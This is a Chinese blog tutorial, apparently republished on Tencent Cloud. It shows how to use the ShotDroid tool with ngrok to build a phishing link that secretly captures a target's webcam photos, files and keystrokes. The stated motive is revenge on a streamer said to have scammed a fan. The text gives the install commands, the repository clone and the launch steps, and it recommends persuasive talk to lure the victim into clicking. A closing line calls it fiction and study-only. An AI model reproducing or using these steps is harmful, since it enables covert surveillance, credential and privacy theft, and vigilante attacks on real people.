当你为某位网红小姐姐一掷千金,刷了20几个W。结果对方是个抠脚大汉,你的心情会是怎样的?事情的起源是这样的,某位粉丝留言说自己在某平台给小姐姐刷礼物,刷了20W,感觉自己被骗了,让我帮帮他,于是便有了这篇文章!
我们可以给对方生成一条链接,诱骗器打开!当期打开链接后,便可以获取对方手机的信息,如摄像头,相册文件,键盘记录等等。
而利用Android肾透神器ShotDroid
便能很方便的解决这个问题!
隐藏安卓应用。
自定义文件目录。
基于Android的键盘记录
利用html 模板获取面部网络摄像头。
首先安装依赖环境
apt install zenity xterm
安装ngrok
ngrok
是一款优秀的内网映射工具,可以方便的让不在同一局域网内的设备进行访问。
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
由于网络原因 安装过程可能有点慢
登录ngrok的官网进行注册ngrok.com
注册完成后,访问https://dashboard.ngrok.com/get-started/your-authtoken
获取api
然后再kali中执行下面命令,添加密匙
ngrok config add-authtoken 2DEuwA***************1eRSym
git clone https://github.com/kp300/shotdroid.git
cd shotdroid
bash shotdroid.sh
参数说明:
获取摄像头
注意,生成的ngrok链接不能复制,访问http://127.0.0.1:4040便可以复制了
访问链接后,效果如下,当然页面你可以自定义!
允许摄像头后,照片会保存!
利用ShotDroid
可以便捷的对诈骗者进行肾透。但成功与否,还需要你的花言巧语诱导其点击链接。当然程序本身也有一定的缺陷,如网络问题不是很友好!
最后,本文纯属虚构。技术仅限学习和研究,请勿非法恶意攻击他人。
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/2115815
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。